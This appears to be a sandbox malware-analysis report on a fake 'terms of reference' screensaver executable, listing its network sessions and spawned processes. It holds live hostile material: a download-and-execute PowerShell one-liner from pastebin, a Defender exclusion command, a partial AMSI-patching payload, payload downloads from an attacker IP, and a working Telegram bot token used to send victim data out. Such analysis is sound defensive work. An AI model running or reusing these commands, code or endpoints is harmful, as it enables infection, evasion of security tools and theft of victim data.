• ip-api.com
• 89.23.97.214
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 172.67.74.152 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:28.128469944 CET | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
Feb 17, 2025 18:57:28.598639965 CET | 429 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 17:57:28 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 9137a8f54c864251-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1531&rtt_var=765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=39&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49720 | 208.95.112.1 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:28.628977060 CET | 53 | OUT | GET /json/8.46.123.189 HTTP/1.1
Host: ip-api.com
Feb 17, 2025 18:57:29.109947920 CET | 482 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 17:57:28 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/Chicago","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 60791 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:33.335258961 CET | 65 | OUT | GET /TeamBuild/win64_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 60792 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:33.336797953 CET | 65 | OUT | GET /TeamBuild/win32_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 59672 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:54.810682058 CET | 65 | OUT | GET /TeamBuild/win32_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 59671 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:57:54.810683012 CET | 65 | OUT | GET /TeamBuild/win64_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 59786 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:58:16.193226099 CET | 65 | OUT | GET /TeamBuild/win32_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 59787 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:58:16.197654009 CET | 65 | OUT | GET /TeamBuild/win64_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 59788 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:58:37.612598896 CET | 65 | OUT | GET /TeamBuild/win64_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 59789 | 89.23.97.214 | 80 | 1988 | C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 18:58:37.615700960 CET | 65 | OUT | GET /TeamBuild/win32_svchost.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.19.24 | 443 | 3276 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-17 17:57:13 UTC | 169 | OUT | GET /raw/WHKzW2nr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2025-02-17 17:57:13 UTC | 398 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 17:57:13 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 1625
Last-Modified: Mon, 17 Feb 2025 17:30:08 GMT
Server: cloudflare
CF-RAY: 9137a898aeee19bb-EWR
2025-02-17 17:57:13 UTC | 971 | IN | Data Raw: 31 37 33 37 0d 0a 0d 0a 0d 0a 41 64 64 2d 54 79 70 65 20 2d 54 79 70 65 44 65 66 69 6e 69 74 69 6f 6e 20 40 22 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0d 0a 0d 0a 70 75 62 6c 69 63 20 63 6c 61 73 73 20 4e 75 6b 65 41 4d 53 49 0d 0a 7b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 4f 50 45 52 41 54 49 4f 4e 20 3d 20 30 78 30 30 30 38 3b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 52 45 41 44 20 3d 20 30 78 30 30 31 30 3b 0d 0a 20 20 20 20 70 75
Data Ascii: 1737Add-Type -TypeDefinition @"using System;using System.Diagnostics;using System.Runtime.InteropServices;public class NukeAMSI{ public const int PROCESS_VM_OPERATION = 0x0008; public const int PROCESS_VM_READ = 0x0010; pu
2025-02-17 17:57:13 UTC | 1369 | IN | Data Raw: 73 65 28 49 6e 74 50 74 72 20 48 61 6e 64 6c 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 4c 6f 61 64 4c 69 62 72 61 72 79 3a 20 4c 6f 61 64 73 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 6d 6f 64 75 6c 65 20 69 6e 74 6f 20 74 68 65 20 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 66 20 74 68 65 20 63 61 6c 6c 69 6e 67 20 70 72 6f 63 65 73 73 2e 0d 0a 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 29 5d 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 4c 6f 61 64 4c 69 62 72 61 72 79 28 73 74 72 69 6e 67 20 6c 70 46 69 6c 65 4e 61 6d 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 47 65 74 50 72 6f 63 41 64 64
Data Ascii: se(IntPtr Handle); // LoadLibrary: Loads the specified module into the address space of the calling process. [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr LoadLibrary(string lpFileName); // GetProcAdd
2025-02-17 17:57:13 UTC | 1369 | IN | Data Raw: 5d 24 70 72 6f 63 65 73 73 49 64 0d 0a 20 20 20 20 29 0d 0a 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 4d 6f 64 69 66 79 69 6e 67 20 41 4d 53 49 20 66 6f 72 20 70 72 6f 63 65 73 73 20 49 44 3a 20 24 70 72 6f 63 65 73 73 49 64 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 0d 0a 20 20 20 20 24 70 61 74 63 68 20 3d 20 5b 62 79 74 65 5d 30 78 45 42 20 20 23 20 54 68 65 20 70 61 74 63 68 20 62 79 74 65 20 74 6f 20 6d 6f 64 69 66 79 20 41 4d 53 49 20 62 65 68 61 76 69 6f 72 0d 0a 0d 0a 20 20 20 20 24 6f 62 6a 65 63 74 41 74 74 72 69 62 75 74 65 73 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 75 6b 65 41 4d 53 49 2b 4f 42 4a 45 43 54 5f 41 54 54 52 49 42 55 54 45 53 0d 0a 20 20 20 20 24 63 6c 69 65 6e 74 49 64 20 3d 20 4e
Data Ascii: ]$processId ) Write-Host "Modifying AMSI for process ID: $processId" -ForegroundColor Cyan $patch = [byte]0xEB # The patch byte to modify AMSI behavior $objectAttributes = New-Object NukeAMSI+OBJECT_ATTRIBUTES $clientId = N
2025-02-17 17:57:13 UTC | 1369 | IN | Data Raw: 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 66 69 6e 64 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 61 6d 73 69 2e 64 6c 6c 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a 20 20 20 20 20 20 20 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 4e 74 43 6c 6f 73 65 28 24 68 48 61 6e 64 6c 65 29 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 23 20 43 61 6c 63 75 6c 61 74 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 70 61 74 63 68 20 61 64 64 72 65 73 73 20 62 79 20 6f 66 66 73 65 74 74 69 6e 67 20 66 72 6f 6d 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 0d 0a 20 20 20 20 24 70 61 74 63
Data Ascii: Write-Host "Failed to find AmsiOpenSession function in amsi.dll." -ForegroundColor Red [NukeAMSI]::NtClose($hHandle) return } # Calculate the correct patch address by offsetting from AmsiOpenSession function $patc
2025-02-17 17:57:13 UTC | 873 | IN | Data Raw: 72 6f 74 65 63 74 69 6f 6e 2e 2e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 20 20 20 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 20 3d 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 28 24 68 48 61 6e 64 6c 65 2c 20 24 70 61 74 63 68 41 64 64 72 2c 20 24 73 69 7a 65 2c 20 24 6f 6c 64 50 72 6f 74 65 63 74 2c 20 5b 72 65 66 5d 24 6f 6c 64 50 72 6f 74 65 63 74 29 0d 0a 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 72 65 73 74 6f 72 65 20 6d 65 6d 6f 72 79 20 70 72 6f 74 65 63 74 69 6f 6e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f
Data Ascii: rotection..." -ForegroundColor Cyan $restoreStatus = [NukeAMSI]::VirtualProtectEx($hHandle, $patchAddr, $size, $oldProtect, [ref]$oldProtect) if (-not $restoreStatus) { Write-Host "Failed to restore memory protection." -ForegroundColo
2025-02-17 17:57:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:1
Source IP:192.168.2.5
Source Port:49726
Destination IP:149.154.167.220
Destination Port:443
PID:1988
Process:C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe

Timestamp: 2025-02-17 17:57:31 UTC, Bytes transferred: 409, Direction: OUT
GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1
Host: api.telegram.org
Timestamp: 2025-02-17 17:57:32 UTC, Bytes transferred: 388, Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 17 Feb 2025 17:57:32 GMT
Content-Type: application/json
Content-Length: 597
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-02-17 17:57:32 UTC, Bytes transferred: 597, Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 31 34 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
Data Ascii: {"ok":true,"result":{"message_id":1014,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


Session ID:2
Source IP:192.168.2.5
Source Port:59791
Destination IP:149.154.167.220
Destination Port:443
PID:1988
Process:C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe

Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 174, Direction: OUT
POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
Host: api.telegram.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 138, Direction: OUT
Data Raw: 63 68 61 74 5f 69 64 3d 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 26 74 65 78 74 3d 25 45 32 25 39 44 25 38 43 2b 46 61 69 6c 65 64 2b 74 6f 2b 64 6f 77 6e 6c 6f 61 64 2b 66 69 6c 65 2b 25 32 38 77 69 6e 33 32 5f 73 76 63 68 6f 73 74 25 32 39 25 33 41 2b 45 72 72 6f 72 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
Data Ascii: chat_id=-1002264615855&text=%E2%9D%8C+Failed+to+download+file+%28win32_svchost%29%3A+Error%3A+An+error+occurred+while+sending+the+request.
Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 388, Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 17 Feb 2025 17:58:59 GMT
Content-Type: application/json
Content-Length: 446
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 446, Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 31 39 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
Data Ascii: {"ok":true,"result":{"message_id":1019,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


Session ID:3
Source IP:192.168.2.5
Source Port:59790
Destination IP:149.154.167.220
Destination Port:443
PID:1988
Process:C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe

Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 174, Direction: OUT
POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
Host: api.telegram.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Timestamp: 2025-02-17 17:58:59 UTC, Bytes transferred: 138, Direction: OUT
Data Raw: 63 68 61 74 5f 69 64 3d 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 26 74 65 78 74 3d 25 45 32 25 39 44 25 38 43 2b 46 61 69 6c 65 64 2b 74 6f 2b 64 6f 77 6e 6c 6f 61 64 2b 66 69 6c 65 2b 25 32 38 77 69 6e 36 34 5f 73 76 63 68 6f 73 74 25 32 39 25 33 41 2b 45 72 72 6f 72 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
Data Ascii: chat_id=-1002264615855&text=%E2%9D%8C+Failed+to+download+file+%28win64_svchost%29%3A+Error%3A+An+error+occurred+while+sending+the+request.
Timestamp: 2025-02-17 17:59:00 UTC, Bytes transferred: 388, Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 17 Feb 2025 17:58:59 GMT
Content-Type: application/json
Content-Length: 446
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-02-17 17:59:00 UTC, Bytes transferred: 446, Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 32 30 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
Data Ascii: {"ok":true,"result":{"message_id":1020,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


Target ID:0
Start time:12:57:08
Start date:17/02/2025
Path:C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"
Imagebase:0x7ff6a79c0000
File size:38'551'524 bytes
MD5 hash:C364BCDCA858DBB480E269B7C0C0DEDC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:12:57:09
Start date:17/02/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:12:57:09
Start date:17/02/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:12:57:09
Start date:17/02/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:12:57:09
Start date:17/02/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:12:57:12
Start date:17/02/2025
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Imagebase:0x7ff661920000
File size:2'759'232 bytes
                                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                      Start time:12:57:13
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
                                                                                                                                                                                      Imagebase:0x7ff71a1d0000
                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                      Start time:12:57:23
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                      Start time:12:57:23
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true
